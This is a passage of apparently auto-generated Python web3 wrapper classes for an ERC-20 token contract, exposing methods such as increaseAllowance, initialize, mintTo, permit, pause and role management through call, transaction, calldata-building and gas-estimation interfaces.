class IncreaseAllowanceMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the increaseAllowance method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, spender: str, added_value: int):
"""Validate the inputs to the increaseAllowance method."""
self.validator.assert_valid(
method_name="increaseAllowance",
parameter_name="spender",
argument_value=spender,
)
spender = self.validate_and_checksum_address(spender)
self.validator.assert_valid(
method_name="increaseAllowance",
parameter_name="addedValue",
argument_value=added_value,
)
# safeguard against fractional inputs
added_value = int(added_value)
return (spender, added_value)
def call(
self,
spender: str,
added_value: int,
tx_params: Optional[TxParams] = None,
) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(spender, added_value) = self.validate_and_normalize_inputs(
spender, added_value
)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(spender, added_value).call(
tx_params.as_dict()
)
return bool(returned)
def send_transaction(
self,
spender: str,
added_value: int,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(spender, added_value) = self.validate_and_normalize_inputs(
spender, added_value
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(spender, added_value).transact(
tx_params.as_dict()
)
def build_transaction(
self,
spender: str,
added_value: int,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(spender, added_value) = self.validate_and_normalize_inputs(
spender, added_value
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(spender, added_value).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
spender: str,
added_value: int,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(spender, added_value) = self.validate_and_normalize_inputs(
spender, added_value
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(spender, added_value).estimateGas(
tx_params.as_dict()
)
class InitializeMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the initialize method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self,
default_admin: str,
name: str,
symbol: str,
contract_uri: str,
trusted_forwarders: List[str],
primary_sale_recipient: str,
platform_fee_recipient: str,
platform_fee_bps: int,
):
"""Validate the inputs to the initialize method."""
self.validator.assert_valid(
method_name="initialize",
parameter_name="_defaultAdmin",
argument_value=default_admin,
)
default_admin = self.validate_and_checksum_address(default_admin)
self.validator.assert_valid(
method_name="initialize",
parameter_name="_name",
argument_value=name,
)
self.validator.assert_valid(
method_name="initialize",
parameter_name="_symbol",
argument_value=symbol,
)
self.validator.assert_valid(
method_name="initialize",
parameter_name="_contractURI",
argument_value=contract_uri,
)
self.validator.assert_valid(
method_name="initialize",
parameter_name="_trustedForwarders",
argument_value=trusted_forwarders,
)
self.validator.assert_valid(
method_name="initialize",
parameter_name="_primarySaleRecipient",
argument_value=primary_sale_recipient,
)
primary_sale_recipient = self.validate_and_checksum_address(
primary_sale_recipient
)
self.validator.assert_valid(
method_name="initialize",
parameter_name="_platformFeeRecipient",
argument_value=platform_fee_recipient,
)
platform_fee_recipient = self.validate_and_checksum_address(
platform_fee_recipient
)
self.validator.assert_valid(
method_name="initialize",
parameter_name="_platformFeeBps",
argument_value=platform_fee_bps,
)
# safeguard against fractional inputs
platform_fee_bps = int(platform_fee_bps)
return (
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
platform_fee_recipient,
platform_fee_bps,
)
def call(
self,
default_admin: str,
name: str,
symbol: str,
contract_uri: str,
trusted_forwarders: List[str],
primary_sale_recipient: str,
platform_fee_recipient: str,
platform_fee_bps: int,
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
platform_fee_recipient,
platform_fee_bps,
) = self.validate_and_normalize_inputs(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
platform_fee_recipient,
platform_fee_bps,
)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
platform_fee_recipient,
platform_fee_bps,
).call(tx_params.as_dict())
def send_transaction(
self,
default_admin: str,
name: str,
symbol: str,
contract_uri: str,
trusted_forwarders: List[str],
primary_sale_recipient: str,
platform_fee_recipient: str,
platform_fee_bps: int,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
platform_fee_recipient,
platform_fee_bps,
) = self.validate_and_normalize_inputs(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
platform_fee_recipient,
platform_fee_bps,
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
platform_fee_recipient,
platform_fee_bps,
).transact(tx_params.as_dict())
def build_transaction(
self,
default_admin: str,
name: str,
symbol: str,
contract_uri: str,
trusted_forwarders: List[str],
primary_sale_recipient: str,
platform_fee_recipient: str,
platform_fee_bps: int,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
platform_fee_recipient,
platform_fee_bps,
) = self.validate_and_normalize_inputs(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
platform_fee_recipient,
platform_fee_bps,
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
platform_fee_recipient,
platform_fee_bps,
).buildTransaction(tx_params.as_dict())
def estimate_gas(
self,
default_admin: str,
name: str,
symbol: str,
contract_uri: str,
trusted_forwarders: List[str],
primary_sale_recipient: str,
platform_fee_recipient: str,
platform_fee_bps: int,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
platform_fee_recipient,
platform_fee_bps,
) = self.validate_and_normalize_inputs(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
platform_fee_recipient,
platform_fee_bps,
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
platform_fee_recipient,
platform_fee_bps,
).estimateGas(tx_params.as_dict())
class IsTrustedForwarderMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the isTrustedForwarder method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, forwarder: str):
"""Validate the inputs to the isTrustedForwarder method."""
self.validator.assert_valid(
method_name="isTrustedForwarder",
parameter_name="forwarder",
argument_value=forwarder,
)
forwarder = self.validate_and_checksum_address(forwarder)
return forwarder
def call(
self, forwarder: str, tx_params: Optional[TxParams] = None
) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(forwarder) = self.validate_and_normalize_inputs(forwarder)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(forwarder).call(tx_params.as_dict())
return bool(returned)
def send_transaction(
self, forwarder: str, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(forwarder) = self.validate_and_normalize_inputs(forwarder)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(forwarder).transact(tx_params.as_dict())
def build_transaction(
self, forwarder: str, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(forwarder) = self.validate_and_normalize_inputs(forwarder)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(forwarder).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, forwarder: str, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(forwarder) = self.validate_and_normalize_inputs(forwarder)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(forwarder).estimateGas(
tx_params.as_dict()
)
class MintToMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the mintTo method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, to: str, amount: int):
"""Validate the inputs to the mintTo method."""
self.validator.assert_valid(
method_name="mintTo",
parameter_name="to",
argument_value=to,
)
to = self.validate_and_checksum_address(to)
self.validator.assert_valid(
method_name="mintTo",
parameter_name="amount",
argument_value=amount,
)
# safeguard against fractional inputs
amount = int(amount)
return (to, amount)
def call(
self, to: str, amount: int, tx_params: Optional[TxParams] = None
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(to, amount) = self.validate_and_normalize_inputs(to, amount)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(to, amount).call(tx_params.as_dict())
def send_transaction(
self, to: str, amount: int, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(to, amount) = self.validate_and_normalize_inputs(to, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(to, amount).transact(
tx_params.as_dict()
)
def build_transaction(
self, to: str, amount: int, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(to, amount) = self.validate_and_normalize_inputs(to, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(to, amount).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, to: str, amount: int, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(to, amount) = self.validate_and_normalize_inputs(to, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(to, amount).estimateGas(
tx_params.as_dict()
)
class MintWithSignatureMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the mintWithSignature method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, req: ITokenERC20MintRequest, signature: Union[bytes, str]
):
"""Validate the inputs to the mintWithSignature method."""
self.validator.assert_valid(
method_name="mintWithSignature",
parameter_name="_req",
argument_value=req,
)
self.validator.assert_valid(
method_name="mintWithSignature",
parameter_name="_signature",
argument_value=signature,
)
return (req, signature)
def call(
self,
req: ITokenERC20MintRequest,
signature: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(req, signature) = self.validate_and_normalize_inputs(req, signature)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(req, signature).call(tx_params.as_dict())
def send_transaction(
self,
req: ITokenERC20MintRequest,
signature: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(req, signature) = self.validate_and_normalize_inputs(req, signature)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(req, signature).transact(
tx_params.as_dict()
)
def build_transaction(
self,
req: ITokenERC20MintRequest,
signature: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(req, signature) = self.validate_and_normalize_inputs(req, signature)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(req, signature).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
req: ITokenERC20MintRequest,
signature: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(req, signature) = self.validate_and_normalize_inputs(req, signature)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(req, signature).estimateGas(
tx_params.as_dict()
)
class MulticallMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the multicall method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, data: List[Union[bytes, str]]):
"""Validate the inputs to the multicall method."""
self.validator.assert_valid(
method_name="multicall",
parameter_name="data",
argument_value=data,
)
return data
def call(
self,
data: List[Union[bytes, str]],
tx_params: Optional[TxParams] = None,
) -> List[Union[bytes, str]]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(data) = self.validate_and_normalize_inputs(data)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(data).call(tx_params.as_dict())
return [Union[bytes, str](element) for element in returned]
def send_transaction(
self,
data: List[Union[bytes, str]],
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(data) = self.validate_and_normalize_inputs(data)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(data).transact(tx_params.as_dict())
def build_transaction(
self,
data: List[Union[bytes, str]],
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(data) = self.validate_and_normalize_inputs(data)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(data).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
data: List[Union[bytes, str]],
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(data) = self.validate_and_normalize_inputs(data)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(data).estimateGas(tx_params.as_dict())
class NameMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the name method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return str(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class NoncesMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the nonces method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, owner: str):
"""Validate the inputs to the nonces method."""
self.validator.assert_valid(
method_name="nonces",
parameter_name="owner",
argument_value=owner,
)
owner = self.validate_and_checksum_address(owner)
return owner
def call(self, owner: str, tx_params: Optional[TxParams] = None) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(owner) = self.validate_and_normalize_inputs(owner)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(owner).call(tx_params.as_dict())
return int(returned)
def send_transaction(
self, owner: str, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(owner) = self.validate_and_normalize_inputs(owner)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(owner).transact(tx_params.as_dict())
def build_transaction(
self, owner: str, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(owner) = self.validate_and_normalize_inputs(owner)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(owner).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, owner: str, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(owner) = self.validate_and_normalize_inputs(owner)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(owner).estimateGas(tx_params.as_dict())
class NumCheckpointsMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the numCheckpoints method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, account: str):
"""Validate the inputs to the numCheckpoints method."""
self.validator.assert_valid(
method_name="numCheckpoints",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
return account
def call(self, account: str, tx_params: Optional[TxParams] = None) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(account).call(tx_params.as_dict())
return int(returned)
def send_transaction(
self, account: str, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account).transact(tx_params.as_dict())
def build_transaction(
self, account: str, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, account: str, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account).estimateGas(
tx_params.as_dict()
)
class PauseMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the pause method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method().call(tx_params.as_dict())
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class PausedMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the paused method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return bool(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class PermitMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the permit method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self,
owner: str,
spender: str,
value: int,
deadline: int,
v: int,
r: Union[bytes, str],
s: Union[bytes, str],
):
"""Validate the inputs to the permit method."""
self.validator.assert_valid(
method_name="permit",
parameter_name="owner",
argument_value=owner,
)
owner = self.validate_and_checksum_address(owner)
self.validator.assert_valid(
method_name="permit",
parameter_name="spender",
argument_value=spender,
)
spender = self.validate_and_checksum_address(spender)
self.validator.assert_valid(
method_name="permit",
parameter_name="value",
argument_value=value,
)
# safeguard against fractional inputs
value = int(value)
self.validator.assert_valid(
method_name="permit",
parameter_name="deadline",
argument_value=deadline,
)
# safeguard against fractional inputs
deadline = int(deadline)
self.validator.assert_valid(
method_name="permit",
parameter_name="v",
argument_value=v,
)
self.validator.assert_valid(
method_name="permit",
parameter_name="r",
argument_value=r,
)
self.validator.assert_valid(
method_name="permit",
parameter_name="s",
argument_value=s,
)
return (owner, spender, value, deadline, v, r, s)
def call(
self,
owner: str,
spender: str,
value: int,
deadline: int,
v: int,
r: Union[bytes, str],
s: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(
owner,
spender,
value,
deadline,
v,
r,
s,
) = self.validate_and_normalize_inputs(
owner, spender, value, deadline, v, r, s
)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(owner, spender, value, deadline, v, r, s).call(
tx_params.as_dict()
)
def send_transaction(
self,
owner: str,
spender: str,
value: int,
deadline: int,
v: int,
r: Union[bytes, str],
s: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(
owner,
spender,
value,
deadline,
v,
r,
s,
) = self.validate_and_normalize_inputs(
owner, spender, value, deadline, v, r, s
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
owner, spender, value, deadline, v, r, s
).transact(tx_params.as_dict())
def build_transaction(
self,
owner: str,
spender: str,
value: int,
deadline: int,
v: int,
r: Union[bytes, str],
s: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(
owner,
spender,
value,
deadline,
v,
r,
s,
) = self.validate_and_normalize_inputs(
owner, spender, value, deadline, v, r, s
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
owner, spender, value, deadline, v, r, s
).buildTransaction(tx_params.as_dict())
def estimate_gas(
self,
owner: str,
spender: str,
value: int,
deadline: int,
v: int,
r: Union[bytes, str],
s: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(
owner,
spender,
value,
deadline,
v,
r,
s,
) = self.validate_and_normalize_inputs(
owner, spender, value, deadline, v, r, s
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
owner, spender, value, deadline, v, r, s
).estimateGas(tx_params.as_dict())
class PrimarySaleRecipientMethod(
ContractMethod
): # pylint: disable=invalid-name
"""Various interfaces to the primarySaleRecipient method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return str(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class RenounceRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the renounceRole method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, role: Union[bytes, str], account: str
):
"""Validate the inputs to the renounceRole method."""
self.validator.assert_valid(
method_name="renounceRole",
parameter_name="role",
argument_value=role,
)
self.validator.assert_valid(
method_name="renounceRole",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
return (role, account)
def call(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(role, account).call(tx_params.as_dict())
def send_transaction(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).transact(
tx_params.as_dict()
)
def build_transaction(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).estimateGas(
tx_params.as_dict()
)
class RevokeRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the revokeRole method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, role: Union[bytes, str], account: str
):
"""Validate the inputs to the revokeRole method."""
self.validator.assert_valid(
method_name="revokeRole",
parameter_name="role",
argument_value=role,
)
self.validator.assert_valid(
method_name="revokeRole",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
return (role, account)
def call(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(role, account).call(tx_params.as_dict())
def send_transaction(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).transact(
tx_params.as_dict()
)
def build_transaction(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
